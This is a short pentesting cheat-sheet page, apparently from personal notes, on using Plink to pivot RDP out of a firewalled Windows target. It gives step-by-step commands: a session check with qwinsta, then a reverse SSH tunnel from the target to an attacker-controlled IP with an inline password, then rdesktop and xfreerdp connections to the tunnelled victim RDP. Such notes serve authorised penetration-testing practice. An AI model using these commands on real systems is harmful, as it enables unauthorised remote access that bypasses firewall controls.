Skip to content

Plink for Remote Desktop Connections #

Used in case RDP service (usually 3389/tcp) is not accessible directly (i.e. not allowed through the external firewall)

  1. On local machine (~Kali)

    1. Create a limited user1
  2. On target machine (Windows)

    1. Check first if somebody has currently connected to the host's RDP service
      • qwinsta /server:<server_name>
    2. Download plink.exe on the target machine
    3. Execute a reverse SSH connection using Plink.exe
      • echo y | plink.exe <YOUR_IP> -P 22 -R 3389: -l <created_limited_username> -pw <password>
  3. On the local machine (~Kali)
    1. Connect to the RDP service using an RDP Client
      • rdesktop -g90x90 localhost (Usually fails)
      • xfreerdp /u:"<victim_machine_username>" /v:localhost:3389

Last update: January 22, 2021